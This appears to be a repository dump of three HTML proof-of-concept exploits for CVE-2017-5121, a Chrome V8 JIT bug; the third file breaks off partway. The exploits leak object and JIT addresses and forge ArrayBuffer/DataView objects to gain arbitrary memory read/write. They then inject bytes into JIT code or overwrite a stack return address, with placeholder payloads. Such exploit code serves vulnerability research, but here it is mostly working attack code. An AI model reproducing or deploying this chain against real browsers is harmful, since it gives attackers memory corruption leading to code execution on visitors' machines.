├── cve-2017-5121-code-injection.html
├── cve-2017-5121-ret-addr-corruption.html
├── cve-2017-5121-spilled-register.html
└── README.md


/cve-2017-5121-code-injection.html:
--------------------------------------------------------------------------------
  1 | <html>
  2 | <head>
  3 |    <meta http-equiv="pragma" content="no-cache" />
  4 |    <meta http-equiv="Cache-Control" content="no-store, must-revalidate" />
  5 |    <meta http-equiv="expires" content="0" />
  6 | </head>
  7 | <body>
  8 |   <div id="dlog" />
  9 | <script>
 10 | function print(s) {
 11 |    //console.log(s);
 12 |    document.getElementById("dlog").innerHTML += s +"<br />"
 13 | }
 14 | 
 15 | // based on Long.js by dcodeIO
 16 | // https://github.com/dcodeIO/Long.js
 17 | // License Apache 2
 18 | class _u64 {
 19 |    constructor(hi, lo) {
 20 |       this.lo_ = lo;
 21 |       this.hi_ = hi;
 22 |    }
 23 | 
 24 |    hex() {
 25 |       var hlo = (this.lo_ < 0 ? (0xFFFFFFFF + this.lo_ + 1) : this.lo_).toString(16)
 26 |       var hhi = (this.hi_ < 0 ? (0xFFFFFFFF + this.hi_ + 1) : this.hi_).toString(16)
 27 |       if(hlo.substr(0,2) == "0x") hlo = hlo.substr(2,hlo.length);
 28 |       if(hhi.substr(0,2) == "0x") hhi = hhi.substr(2,hji.length);
 29 |       hlo = "00000000" + hlo
 30 |       hlo = hlo.substr(hlo.length-8, hlo.length);
 31 |       return "0x" + hhi + hlo;
 32 |    }
 33 | 
 34 |    isZero() {
 35 |       return this.hi_ == 0 && this.lo_ == 0;
 36 |    }
 37 | 
 38 |    equals(val) {
 39 |       return this.hi_ == val.hi_ && this.lo_ == val.lo_;
 40 |    }
 41 | 
 42 |    and(val) {
 43 |       return new _u64(this.hi_ & val.hi_, this.lo_ & val.lo_);
 44 |    }
 45 | 
 46 |    add(val) {
 47 |       var a48 = this.hi_ >>> 16;
 48 |       var a32 = this.hi_ & 0xFFFF;
 49 |       var a16 = this.lo_ >>> 16;
 50 |       var a00 = this.lo_ & 0xFFFF;
 51 | 
 52 |       var b48 = val.hi_ >>> 16;
 53 |       var b32 = val.hi_ & 0xFFFF;
 54 |       var b16 = val.lo_ >>> 16;
 55 |       var b00 = val.lo_ & 0xFFFF;
 56 | 
 57 |       var c48 = 0, c32 = 0, c16 = 0, c00 = 0;
 58 |       c00 += a00 + b00;
 59 |       c16 += c00 >>> 16;
 60 |       c00 &= 0xFFFF;
 61 |       c16 += a16 + b16;
 62 |       c32 += c16 >>> 16;
 63 |       c16 &= 0xFFFF;
 64 |       c32 += a32 + b32;
 65 |       c48 += c32 >>> 16;
 66 |       c32 &= 0xFFFF;
 67 |       c48 += a48 + b48;
 68 |       c48 &= 0xFFFF;
 69 | 
 70 |       return new _u64((c48 << 16) | c32, (c16 << 16) | c00);
 71 |    }
 72 | 
 73 |    addi(h,l) {
 74 |       return this.add(new _u64(h,l));
 75 |    }
 76 | 
 77 |    subi(h,l) {
 78 |       return this.sub(new _u64(h,l));
 79 |    }
 80 | 
 81 |    not() {
 82 |       return new _u64(~this.hi_, ~this.lo_)
 83 |    }
 84 | 
 85 |    neg() {
 86 |       return this.not().add(new _u64(0,1));
 87 |    }
 88 | 
 89 |    sub(val) {
 90 |       return this.add(val.neg());
 91 |    };
 92 | 
 93 |    swap32(val) {
 94 |       return ((val & 0xFF) << 24) | ((val & 0xFF00) << 8) |
 95 |             ((val >> 8) & 0xFF00) | ((val >> 24) & 0xFF);
 96 |    }
 97 | 
 98 |    bswap() {
 99 |       var lo = swap32(this.lo_);
100 |       var hi = swap32(this.hi_);
101 |       return new _u64(lo, hi);
102 |    };
103 | }
104 | var u64 = function(hi, lo) { return new _u64(hi,lo) };
105 | var u64_from_hex_string = function(a) {
106 |    return u64(parseInt(a.substr(0,a.length-8), 16), parseInt(a.substr(-8), 16));
107 | };
108 | 
109 | function hex2float(h) {
110 |    return h * 4.9406564584124654E-324;
111 | }
112 | 
113 | function float2hex(h) {
114 |    return h / 4.9406564584124654E-324;
115 | }
116 | 
117 | //
118 | // Exploit for CVE-2017-5121, PoC and excellent analysis of the bug can be found at
119 | // https://cloudblogs.microsoft.com/microsoftsecure/2017/10/18/browser-security-beyond-sandboxing/
120 | //
121 | var ab1 = new ArrayBuffer(0x13004);
122 | var ab2 = new ArrayBuffer(0x13008);
123 | var fp  = Array.prototype.map;
124 | var ab1_buffer_addr = null;
125 | var ab1_js_arr_addr = null;
126 | var ab2_buffer_addr = null;
127 | var ab2_js_arr_addr = null;
128 | var fp_jit_addr     = null;
129 | var done = false;
130 | var ab = ab1;
131 | 
132 | u32b = new Uint32Array(ab1);
133 | var tw32 = function(off,v32) {
134 |    u32b[off/4] = v32;
135 | }
136 | var tw64 = function(off, v64) {
137 |    u32b[off/4] = v64.lo_;
138 |    u32b[off/4+1] = v64.hi_;
139 | }
140 | 
141 | //
142 | // leak buffer address and backing object of ArrayBuffers
143 | //
144 | var inf0leak = function(f) {
145 |    var o1 = {
146 |       a1 : {},
147 |       b1 : {
148 |                b1b1 : {},
149 |                b1c1 : {b1c1a1: {b1c1a1a1: 0, b1c1a1b1: 0, b1c1a1c1: this} },
150 |                ob01 :0 , ob02 :0 , ob03 :0 , ob04 :0 , ob05 :0 , ob06 :0 ,
151 |                ob07 :0 , ob08 :0 , ob09 :0 , ob10 :0 , ob11 :0 , ob12 :0 ,
152 |                ob13 :0 , ob14 :0 , ob16 :0 , ob17 :0 , ob18 :0 , ob19 :0 ,
153 |                ob20 :0 , ob21 :0 , ob22 :0 , ob23 :0 , ob24 :0 , ob25 :0 ,
154 |                b1a1 : { 
155 |                   spra1y : [ab,ab,ab,ab,ab,ab,ab,ab,ab,ab,ab], 
156 |                   b1a1b11: 1.2, 
157 |                   t00:{},t01:{},
158 |                   b1a1b13: 1.2, 
159 |                   t02:{},t03:{},t04:{},t05:{},t06:{},t07:{},
160 |                   t10:{},t11:{},t12:{},t13:{},t14:{},t15:{},t16:{},t17:{},
161 |                   t20:{},t21:{},t22:{},t23:{},t24:{},t25:{},t26:{},t27:{},
162 |                   t30:{},t31:{},t32:{},t33:{},t34:{},t35:{},t36:{},t37:{},
163 |                   t40:{},t41:{},t42:{},t43:{},t44:{},t45:{},t46:{},t47:{},
164 |                   t50:{},
165 |                   b1a1b12:1.2
166 |                },
167 |       }
168 |    };
169 |    o1.b1.b1c1.b1c1a1.b1c1a1b1 = 0x424242420;
170 |    o1.b1.b1b1.b1c1a1 = f(o1.b1.b1a1.b1a1b11,o1.b1.b1a1.b1a1b12, o1.b1.b1a1.b1a1b13);
171 | }
172 | 
173 | //
174 | // perform leak for ab1
175 | //
176 | while(!done) {
177 |    inf0leak(function(a1, a2, a3) {
178 |          if(a1 != 1.2) {
179 |             ab1_buffer_addr = float2hex(a1);
180 |             ab1_js_arr_addr = float2hex(a2);
181 |             //print("[+] ab1_buffer_addr: " + ab1_buffer_addr.toString(16));
182 |             //print("[+] ab1_js_arr_addr: " + ab1_js_arr_addr.toString(16));
183 |             done = true;
184 |          }
185 |       }
186 |    )
187 | }
188 | //
189 | // perform leak for ab2
190 | //
191 | ab = ab2;
192 | done=false;
193 | while(!done) {
194 |    inf0leak(function(a1, a2, a3) {
195 |          if(a1 != 1.2) {
196 |             ab2_buffer_addr = float2hex(a1);
197 |             //print("[+] ab2_buffer_addr: " + ab2_buffer_addr.toString(16));
198 |             done = true;
199 |          }
200 |       }
201 |    )
202 | }
203 | 
204 | //
205 | // perform leak for jit region
206 | //
207 | ab = fp;
208 | done=false;
209 | while(!done) {
210 |    inf0leak(function(a1, a2, a3) {
211 |          if(a1 != 1.2) {
212 |             fp_jit_addr = float2hex(a3);
213 |             //print("[+] fp_jit_addr: " + fp_jit_addr.toString(16));
214 |             done = true;
215 |          }
216 |       }
217 |    )
218 | }
219 | 
220 | //
221 | // convert to u64 objects for easier usage
222 | //
223 | u64_ab1_buffer_addr = u64_from_hex_string(ab1_buffer_addr.toString(16));
224 | u64_ab1_js_arr_addr = u64_from_hex_string(ab1_js_arr_addr.toString(16)).subi(0,1);
225 | u64_ab2_buffer_addr = u64_from_hex_string(ab2_buffer_addr.toString(16));
226 | u64_ab2_js_arr_addr = u64_ab1_js_arr_addr.addi(0,0x50);
227 | u64_fp_jit_addr     = u64_from_hex_string(fp_jit_addr.toString(16));
228 | 
229 | //
230 | // Create fake ArrayBuffer/DataView (see MS blog post)
231 | //
232 | tw64(0x28, u64_ab1_buffer_addr.addi(0,0x100 + 1));
233 | tw64(0x100 + 0x00, u64_ab1_buffer_addr.addi(0, 0x200 + 1));
234 | tw64(0x100 + 0x08, u64_ab1_buffer_addr.addi(0, 0x200 + 1));
235 | tw64(0x100 + 0x18, u64_ab1_buffer_addr.addi(0, 0x300 + 1));
236 | tw64(0x100 + 0x20, u64(0,0));
237 | tw64(0x100 + 0x28, u64(0x2000,0));
238 | 
239 | tw32(0x200 + 0x0c, 0x1000c5);
240 | 
241 | tw64(0x300 + 0x20, u64_ab1_js_arr_addr.addi(0,0x20));
242 | 
243 | 
244 | //
245 | // trigger CVE-2017-5121 again to overwrite the buffer address of ab1
246 | // this allows us then to manipulate the buffer address of ab2, which
247 | // we then can use to read/write arbitary memory
248 | //
249 | var fake_ab = hex2float(ab1_buffer_addr+1);
250 | var prepare_ab1_hi = function(f) {
251 |    var o = {
252 |       a : {},
253 |       b : {
254 |          bc : {
255 |             bca: [fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab],
256 |             oo1 : 1.2,
257 |             oo2 : {},
258 |          },
259 |          ba : {},
260 |          bb : {bba: {bbaa: 0, bbab: 0, bbac: this} },
261 |       },
262 |    };
263 |    o.b.bb.bba.bbab = 0;
264 |    o.b.ba.bca = f(o.b.bc.oo1, o.b.bc.oo2);
265 | }
266 | 
267 | done =false;
268 | while(!done) {
269 |    prepare_ab1_hi( function(a1, a2) {
270 |          if(a1 != 1.2) {
271 |             DataView.prototype.setUint32.apply(a2, [0, u64_ab1_js_arr_addr.lo_, true]);
272 |             DataView.prototype.setUint32.apply(a2, [4, u64_ab1_js_arr_addr.hi_, true]);
273 |             done = true;
274 |          }
275 |       }
276 |    )
277 | }
278 | 
279 | //
280 | // defining rw primitives
281 | //
282 | var dv_ab1 = new DataView(ab1);
283 | var dv_ab2 = new DataView(ab2);
284 | 
285 | var set_ab2_addr = function(u64_addr) {
286 |    DataView.prototype.setUint32.apply(dv_ab1, [0x50+0x20, u64_addr.lo_, true]);
287 |    DataView.prototype.setUint32.apply(dv_ab1, [0x50+0x24, u64_addr.hi_, true]);
288 | }
289 | 
290 | var r64 = function(u64_addr) {
291 |    set_ab2_addr(u64_addr);
292 |    var rl = DataView.prototype.getUint32.apply(dv_ab2, [0, true]);
293 |    var rh = DataView.prototype.getUint32.apply(dv_ab2, [4, true]);
294 |    var r64t = u64(rh, rl);
295 |    return r64t;
296 | }
297 | 
298 | var w64 = function(u64_addr, u64_val) {
299 |    set_ab2_addr(u64_addr);
300 |    DataView.prototype.setUint32.apply(dv_ab2, [0, u64_val.lo_, true]);
301 |    DataView.prototype.setUint32.apply(dv_ab2, [4, u64_val.hi_, true]);
302 | }
303 | 
304 | //
305 | // code injection into JIT region 
306 | //
307 | w64(u64_fp_jit_addr, u64(0x00001337,0xc0c748cc));
308 | w64(u64_fp_jit_addr.addi(0,8), u64(0xcccccccc,0xcccccccc));
309 | //
310 | // execute JIT function
311 | //
312 | fp();
313 | 
314 | </script>
315 | </body>
316 | </html>
317 | 


--------------------------------------------------------------------------------
/cve-2017-5121-ret-addr-corruption.html:
--------------------------------------------------------------------------------
  1 | <html>
  2 | <head>
  3 |    <meta http-equiv="pragma" content="no-cache" />
  4 |    <meta http-equiv="Cache-Control" content="no-store, must-revalidate" />
  5 |    <meta http-equiv="expires" content="0" />
  6 | </head>
  7 | <body>
  8 |   <div id="dlog" />
  9 | <script>
 10 | function print(s) {
 11 |    //console.log(s);
 12 |    document.getElementById("dlog").innerHTML += s +"<br />"
 13 | }
 14 | 
 15 | // based on Long.js by dcodeIO
 16 | // https://github.com/dcodeIO/Long.js
 17 | // License Apache 2
 18 | class _u64 {
 19 |    constructor(hi, lo) {
 20 |       this.lo_ = lo;
 21 |       this.hi_ = hi;
 22 |    }
 23 | 
 24 |    hex() {
 25 |       var hlo = (this.lo_ < 0 ? (0xFFFFFFFF + this.lo_ + 1) : this.lo_).toString(16)
 26 |       var hhi = (this.hi_ < 0 ? (0xFFFFFFFF + this.hi_ + 1) : this.hi_).toString(16)
 27 |       if(hlo.substr(0,2) == "0x") hlo = hlo.substr(2,hlo.length);
 28 |       if(hhi.substr(0,2) == "0x") hhi = hhi.substr(2,hji.length);
 29 |       hlo = "00000000" + hlo
 30 |       hlo = hlo.substr(hlo.length-8, hlo.length);
 31 |       return "0x" + hhi + hlo;
 32 |    }
 33 | 
 34 |    isZero() {
 35 |       return this.hi_ == 0 && this.lo_ == 0;
 36 |    }
 37 | 
 38 |    equals(val) {
 39 |       return this.hi_ == val.hi_ && this.lo_ == val.lo_;
 40 |    }
 41 | 
 42 |    and(val) {
 43 |       return new _u64(this.hi_ & val.hi_, this.lo_ & val.lo_);
 44 |    }
 45 | 
 46 |    add(val) {
 47 |       var a48 = this.hi_ >>> 16;
 48 |       var a32 = this.hi_ & 0xFFFF;
 49 |       var a16 = this.lo_ >>> 16;
 50 |       var a00 = this.lo_ & 0xFFFF;
 51 | 
 52 |       var b48 = val.hi_ >>> 16;
 53 |       var b32 = val.hi_ & 0xFFFF;
 54 |       var b16 = val.lo_ >>> 16;
 55 |       var b00 = val.lo_ & 0xFFFF;
 56 | 
 57 |       var c48 = 0, c32 = 0, c16 = 0, c00 = 0;
 58 |       c00 += a00 + b00;
 59 |       c16 += c00 >>> 16;
 60 |       c00 &= 0xFFFF;
 61 |       c16 += a16 + b16;
 62 |       c32 += c16 >>> 16;
 63 |       c16 &= 0xFFFF;
 64 |       c32 += a32 + b32;
 65 |       c48 += c32 >>> 16;
 66 |       c32 &= 0xFFFF;
 67 |       c48 += a48 + b48;
 68 |       c48 &= 0xFFFF;
 69 | 
 70 |       return new _u64((c48 << 16) | c32, (c16 << 16) | c00);
 71 |    }
 72 | 
 73 |    addi(h,l) {
 74 |       return this.add(new _u64(h,l));
 75 |    }
 76 | 
 77 |    subi(h,l) {
 78 |       return this.sub(new _u64(h,l));
 79 |    }
 80 | 
 81 |    not() {
 82 |       return new _u64(~this.hi_, ~this.lo_)
 83 |    }
 84 | 
 85 |    neg() {
 86 |       return this.not().add(new _u64(0,1));
 87 |    }
 88 | 
 89 |    sub(val) {
 90 |       return this.add(val.neg());
 91 |    };
 92 | 
 93 |    swap32(val) {
 94 |       return ((val & 0xFF) << 24) | ((val & 0xFF00) << 8) |
 95 |             ((val >> 8) & 0xFF00) | ((val >> 24) & 0xFF);
 96 |    }
 97 | 
 98 |    bswap() {
 99 |       var lo = swap32(this.lo_);
100 |       var hi = swap32(this.hi_);
101 |       return new _u64(lo, hi);
102 |    };
103 | }
104 | var u64 = function(hi, lo) { return new _u64(hi,lo) };
105 | var u64_from_hex_string = function(a) {
106 |    return u64(parseInt(a.substr(0,a.length-8), 16), parseInt(a.substr(-8), 16));
107 | };
108 | 
109 | function hex2float(h) {
110 |    return h * 4.9406564584124654E-324;
111 | }
112 | 
113 | function float2hex(h) {
114 |    return h / 4.9406564584124654E-324;
115 | }
116 | 
117 | //
118 | // Exploit for CVE-2017-5121, PoC and excellent analysis of the bug can be found at
119 | // https://cloudblogs.microsoft.com/microsoftsecure/2017/10/18/browser-security-beyond-sandboxing/
120 | //
121 | var ab1 = new ArrayBuffer(0x13004);
122 | var ab2 = new ArrayBuffer(0x13008);
123 | var ab1_buffer_addr = null;
124 | var ab1_js_arr_addr = null;
125 | var ab2_buffer_addr = null;
126 | var ab2_js_arr_addr = null;
127 | var done = false;
128 | var ab = ab1;
129 | 
130 | u32b = new Uint32Array(ab1);
131 | var tw32 = function(off,v32) {
132 |    u32b[off/4] = v32;
133 | }
134 | var tw64 = function(off, v64) {
135 |    u32b[off/4] = v64.lo_;
136 |    u32b[off/4+1] = v64.hi_;
137 | }
138 | 
139 | //
140 | // leak buffer address and backing object of ArrayBuffers
141 | //
142 | var inf0leak = function(f) {
143 |    var o1 = {
144 |       a1 : {},
145 |       b1 : {
146 |                b1b1 : {},
147 |                b1c1 : {b1c1a1: {b1c1a1a1: 0, b1c1a1b1: 0, b1c1a1c1: this} },
148 |                ob01 :0 , ob02 :0 , ob03 :0 , ob04 :0 , ob05 :0 , ob06 :0 ,
149 |                ob07 :0 , ob08 :0 , ob09 :0 , ob10 :0 , ob11 :0 , ob12 :0 ,
150 |                ob13 :0 , ob14 :0 , ob16 :0 , ob17 :0 , ob18 :0 , ob19 :0 ,
151 |                ob20 :0 , ob21 :0 , ob22 :0 , ob23 :0 , ob24 :0 , ob25 :0 ,
152 |                b1a1 : { 
153 |                   spra1y : [ab,ab,ab,ab,ab,ab,ab,ab,ab,ab,ab], 
154 |                   b1a1b11: 1.2, 
155 |                   t00:{},t01:{},t02:{},t03:{},t04:{},t05:{},t06:{},t07:{},
156 |                   t10:{},t11:{},t12:{},t13:{},t14:{},t15:{},t16:{},t17:{},
157 |                   t20:{},t21:{},t22:{},t23:{},t24:{},t25:{},t26:{},t27:{},
158 |                   t30:{},t31:{},t32:{},t33:{},t34:{},t35:{},t36:{},t37:{},
159 |                   t40:{},t41:{},t42:{},t43:{},t44:{},t45:{},t46:{},t47:{},
160 |                   t50:{},t51:{},
161 |                   b1a1b12:1.2
162 |                },
163 |       }
164 |    };
165 |    o1.b1.b1c1.b1c1a1.b1c1a1b1 = 0x424242420;
166 |    o1.b1.b1b1.b1c1a1 = f(o1.b1.b1a1.b1a1b11,o1.b1.b1a1.b1a1b12);
167 | }
168 | 
169 | //
170 | // perform leak for ab1
171 | //
172 | while(!done) {
173 |    inf0leak(function(a1, a2) {
174 |          if(a1 != 1.2) {
175 |             ab1_buffer_addr = float2hex(a1);
176 |             ab1_js_arr_addr = float2hex(a2);
177 |             //print("[+] ab1_buffer_addr: " + ab1_buffer_addr.toString(16));
178 |             //print("[+] ab1_js_arr_addr: " + ab1_js_arr_addr.toString(16));
179 |             done = true;
180 |          }
181 |       }
182 |    )
183 | }
184 | //
185 | // perform leak for ab2
186 | //
187 | ab = ab2;
188 | done=false;
189 | while(!done) {
190 |    inf0leak(function(a1, a2) {
191 |          if(a1 != 1.2) {
192 |             ab2_buffer_addr = float2hex(a1);
193 |             //print("[+] ab2_buffer_addr: " + ab2_buffer_addr.toString(16));
194 |             done = true;
195 |          }
196 |       }
197 |    )
198 | }
199 | 
200 | //
201 | // convert to u64 objects for easier usage
202 | //
203 | u64_ab1_buffer_addr = u64_from_hex_string(ab1_buffer_addr.toString(16));
204 | u64_ab1_js_arr_addr = u64_from_hex_string(ab1_js_arr_addr.toString(16)).subi(0,1);
205 | u64_ab2_buffer_addr = u64_from_hex_string(ab2_buffer_addr.toString(16));
206 | u64_ab2_js_arr_addr = u64_ab1_js_arr_addr.addi(0,0x50);
207 | 
208 | //
209 | // Create fake ArrayBuffer/DataView (see MS blog post)
210 | //
211 | tw64(0x28, u64_ab1_buffer_addr.addi(0,0x100 + 1));
212 | tw64(0x100 + 0x00, u64_ab1_buffer_addr.addi(0, 0x200 + 1));
213 | tw64(0x100 + 0x08, u64_ab1_buffer_addr.addi(0, 0x200 + 1));
214 | tw64(0x100 + 0x18, u64_ab1_buffer_addr.addi(0, 0x300 + 1));
215 | tw64(0x100 + 0x20, u64(0,0));
216 | tw64(0x100 + 0x28, u64(0x2000,0));
217 | 
218 | tw32(0x200 + 0x0c, 0x1000c5);
219 | 
220 | tw64(0x300 + 0x20, u64_ab1_js_arr_addr.addi(0,0x20));
221 | 
222 | 
223 | //
224 | // trigger CVE-2017-5121 again to overwrite the buffer address of ab1
225 | // this allows us then to manipulate the buffer address of ab2, which
226 | // we then can use to read/write arbitrary memory
227 | //
228 | var fake_ab = hex2float(ab1_buffer_addr+1);
229 | var prepare_ab1_hi = function(f) {
230 |    var o = {
231 |       a : {},
232 |       b : {
233 |          bc : {
234 |             bca: [fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab],
235 |             oo1 : 1.2,
236 |             oo2 : {},
237 |          },
238 |          ba : {},
239 |          bb : {bba: {bbaa: 0, bbab: 0, bbac: this} },
240 |       },
241 |    };
242 |    o.b.bb.bba.bbab = 0;
243 |    o.b.ba.bca = f(o.b.bc.oo1, o.b.bc.oo2);
244 | }
245 | 
246 | done =false;
247 | while(!done) {
248 |    prepare_ab1_hi( function(a1, a2) {
249 |          if(a1 != 1.2) {
250 |             DataView.prototype.setUint32.apply(a2, [0, u64_ab1_js_arr_addr.lo_, true]);
251 |             DataView.prototype.setUint32.apply(a2, [4, u64_ab1_js_arr_addr.hi_, true]);
252 |             done = true;
253 |          }
254 |       }
255 |    )
256 | }
257 | 
258 | //
259 | // defining rw primitives
260 | //
261 | var dv_ab1 = new DataView(ab1);
262 | var dv_ab2 = new DataView(ab2);
263 | 
264 | var set_ab2_addr = function(u64_addr) {
265 |    DataView.prototype.setUint32.apply(dv_ab1, [0x50+0x20, u64_addr.lo_, true]);
266 |    DataView.prototype.setUint32.apply(dv_ab1, [0x50+0x24, u64_addr.hi_, true]);
267 | }
268 | 
269 | var r64 = function(u64_addr) {
270 |    set_ab2_addr(u64_addr);
271 |    var rl = DataView.prototype.getUint32.apply(dv_ab2, [0, true]);
272 |    var rh = DataView.prototype.getUint32.apply(dv_ab2, [4, true]);
273 |    var r64t = u64(rh, rl);
274 |    return r64t;
275 | }
276 | 
277 | var w64 = function(u64_addr, u64_val) {
278 |    set_ab2_addr(u64_addr);
279 |    DataView.prototype.setUint32.apply(dv_ab2, [0, u64_val.lo_, true]);
280 |    DataView.prototype.setUint32.apply(dv_ab2, [4, u64_val.hi_, true]);
281 | }
282 | 
283 | 
284 | //
285 | // Leak address of isolate for disclosing a valid stack address
286 | // 
287 | var isolate = r64(u64_ab1_js_arr_addr);
288 | isolate = isolate.and(u64(0xFFFFFFFF, 0xFFF80000));
289 | isolate = r64(isolate.addi(0,0x38));
290 | isolate = isolate.and(u64(0xFFFFFFFF, 0xFFFFFFC0));
291 | print("[+] isolate: " + isolate.hex());
292 | 
293 | var xhr = new XMLHttpRequest();
294 | 
295 | //
296 | // thread_local_top_ contains pointer to the stack 
297 | //
298 | var thread_local_top_ = isolate.addi(0,0x18D0);
299 | 
300 | var xhr_delay = function(e) {
301 |    print('[+] thread_local_top_ ' + thread_local_top_.hex());
302 |    var c_entry_fp_ = r64(thread_local_top_.addi(0,0x70));
303 |    var handler_    = r64(thread_local_top_.addi(0,0x78));
304 | 
305 |    //
306 |    // stack frame of blink::EventTarget::FireEventListeners(blink::Event *,blink::EventTargetData *,blink::HeapVector<blink::RegisteredEventListener,1ul> &)
307 |    //
308 |    var stack = c_entry_fp_.addi(0,0x9A0);
309 |    var ret_stack_addr = stack.addi(0,0x38);
310 |    w64(ret_stack_addr, u64(0x4141, 0x4141));
311 | }
312 | 
313 | xhr.onreadystatechange = xhr_delay;
314 | xhr.open("GET", "c0ffee", true);
315 | </script>
316 | </body>
317 | </html>
318 | 


--------------------------------------------------------------------------------
/cve-2017-5121-spilled-register.html:
--------------------------------------------------------------------------------
  1 | <html>
  2 | <head>
  3 |    <meta http-equiv="pragma" content="no-cache" />
  4 |    <meta http-equiv="Cache-Control" content="no-store, must-revalidate" />
  5 |    <meta http-equiv="expires" content="0" />
  6 | </head>
  7 | <body>
  8 |   <div id="dlog" />
  9 | <script>
 10 | function print(s) {
 11 |    //console.log(s);
 12 |    document.getElementById("dlog").innerHTML += s +"<br />"
 13 | }
 14 | 
 15 | // based on Long.js by dcodeIO
 16 | // https://github.com/dcodeIO/Long.js
 17 | // License Apache 2
 18 | class _u64 {
 19 |    constructor(hi, lo) {
 20 |       this.lo_ = lo;
 21 |       this.hi_ = hi;
 22 |    }
 23 | 
 24 |    hex() {
 25 |       var hlo = (this.lo_ < 0 ? (0xFFFFFFFF + this.lo_ + 1) : this.lo_).toString(16)
 26 |       var hhi = (this.hi_ < 0 ? (0xFFFFFFFF + this.hi_ + 1) : this.hi_).toString(16)
 27 |       if(hlo.substr(0,2) == "0x") hlo = hlo.substr(2,hlo.length);
 28 |       if(hhi.substr(0,2) == "0x") hhi = hhi.substr(2,hji.length);
 29 |       hlo = "00000000" + hlo
 30 |       hlo = hlo.substr(hlo.length-8, hlo.length);
 31 |       return "0x" + hhi + hlo;
 32 |    }
 33 | 
 34 |    isZero() {
 35 |       return this.hi_ == 0 && this.lo_ == 0;
 36 |    }
 37 | 
 38 |    equals(val) {
 39 |       return this.hi_ == val.hi_ && this.lo_ == val.lo_;
 40 |    }
 41 | 
 42 |    and(val) {
 43 |       return new _u64(this.hi_ & val.hi_, this.lo_ & val.lo_);
 44 |    }
 45 | 
 46 |    add(val) {
 47 |       var a48 = this.hi_ >>> 16;
 48 |       var a32 = this.hi_ & 0xFFFF;
 49 |       var a16 = this.lo_ >>> 16;
 50 |       var a00 = this.lo_ & 0xFFFF;
 51 | 
 52 |       var b48 = val.hi_ >>> 16;
 53 |       var b32 = val.hi_ & 0xFFFF;
 54 |       var b16 = val.lo_ >>> 16;
 55 |       var b00 = val.lo_ & 0xFFFF;
 56 | 
 57 |       var c48 = 0, c32 = 0, c16 = 0, c00 = 0;
 58 |       c00 += a00 + b00;
 59 |       c16 += c00 >>> 16;
 60 |       c00 &= 0xFFFF;
 61 |       c16 += a16 + b16;
 62 |       c32 += c16 >>> 16;
 63 |       c16 &= 0xFFFF;
 64 |       c32 += a32 + b32;
 65 |       c48 += c32 >>> 16;
 66 |       c32 &= 0xFFFF;
 67 |       c48 += a48 + b48;
 68 |       c48 &= 0xFFFF;
 69 | 
 70 |       return new _u64((c48 << 16) | c32, (c16 << 16) | c00);
 71 |    }
 72 | 
 73 |    addi(h,l) {
 74 |       return this.add(new _u64(h,l));
 75 |    }
 76 | 
 77 |    subi(h,l) {
 78 |       return this.sub(new _u64(h,l));
 79 |    }
 80 | 
 81 |    not() {
 82 |       return new _u64(~this.hi_, ~this.lo_)
 83 |    }
 84 | 
 85 |    neg() {
 86 |       return this.not().add(new _u64(0,1));
 87 |    }
 88 | 
 89 |    sub(val) {
 90 |       return this.add(val.neg());
 91 |    };
 92 | 
 93 |    swap32(val) {
 94 |       return ((val & 0xFF) << 24) | ((val & 0xFF00) << 8) |
 95 |             ((val >> 8) & 0xFF00) | ((val >> 24) & 0xFF);
 96 |    }
 97 | 
 98 |    bswap() {
 99 |       var lo = swap32(this.lo_);
100 |       var hi = swap32(this.hi_);
101 |       return new _u64(lo, hi);
102 |    };
103 | }
104 | var u64 = function(hi, lo) { return new _u64(hi,lo) };
105 | var u64_from_hex_string = function(a) {
106 |    return u64(parseInt(a.substr(0,a.length-8), 16), parseInt(a.substr(-8), 16));
107 | };
108 | 
109 | function hex2float(h) {
110 |    return h * 4.9406564584124654E-324;
111 | }
112 | 
113 | function float2hex(h) {
114 |    return h / 4.9406564584124654E-324;
115 | }
116 | 
117 | //
118 | // Exploit for CVE-2017-5121, PoC and excellent analysis of the bug can be found at
119 | // https://cloudblogs.microsoft.com/microsoftsecure/2017/10/18/browser-security-beyond-sandboxing/
120 | //
121 | var ab1 = new ArrayBuffer(0x13004);
122 | var ab2 = new ArrayBuffer(0x13008);
123 | var ab1_buffer_addr = null;
124 | var ab1_js_arr_addr = null;
125 | var ab2_buffer_addr = null;
126 | var ab2_js_arr_addr = null;
127 | var done = false;
128 | var ab = ab1;
129 | 
130 | u32b = new Uint32Array(ab1);
131 | var tw32 = function(off,v32) {
132 |    u32b[off/4] = v32;
133 | }
134 | var tw64 = function(off, v64) {
135 |    u32b[off/4] = v64.lo_;
136 |    u32b[off/4+1] = v64.hi_;
137 | }
138 | 
139 | //
140 | // leak buffer address and backing object of ArrayBuffers
141 | //
142 | var inf0leak = function(f) {
143 |    var o1 = {
144 |       a1 : {},
145 |       b1 : {
146 |                b1b1 : {},
147 |                b1c1 : {b1c1a1: {b1c1a1a1: 0, b1c1a1b1: 0, b1c1a1c1: this} },
148 |                ob01 :0 , ob02 :0 , ob03 :0 , ob04 :0 , ob05 :0 , ob06 :0 ,
149 |                ob07 :0 , ob08 :0 , ob09 :0 , ob10 :0 , ob11 :0 , ob12 :0 ,
150 |                ob13 :0 , ob14 :0 , ob16 :0 , ob17 :0 , ob18 :0 , ob19 :0 ,
151 |                ob20 :0 , ob21 :0 , ob22 :0 , ob23 :0 , ob24 :0 , ob25 :0 ,
152 |                b1a1 : { 
153 |                   spra1y : [ab,ab,ab,ab,ab,ab,ab,ab,ab,ab,ab], 
154 |                   b1a1b11: 1.2, 
155 |                   t00:{},t01:{},t02:{},t03:{},t04:{},t05:{},t06:{},t07:{},
156 |                   t10:{},t11:{},t12:{},t13:{},t14:{},t15:{},t16:{},t17:{},
157 |                   t20:{},t21:{},t22:{},t23:{},t24:{},t25:{},t26:{},t27:{},
158 |                   t30:{},t31:{},t32:{},t33:{},t34:{},t35:{},t36:{},t37:{},
159 |                   t40:{},t41:{},t42:{},t43:{},t44:{},t45:{},t46:{},t47:{},
160 |                   t50:{},t51:{},
161 |                   b1a1b12:1.2
162 |                },
163 |       }
164 |    };
165 |    o1.b1.b1c1.b1c1a1.b1c1a1b1 = 0x424242420;
166 |    o1.b1.b1b1.b1c1a1 = f(o1.b1.b1a1.b1a1b11,o1.b1.b1a1.b1a1b12);
167 | }
168 | 
169 | //
170 | // perform leak for ab1
171 | //
172 | while(!done) {
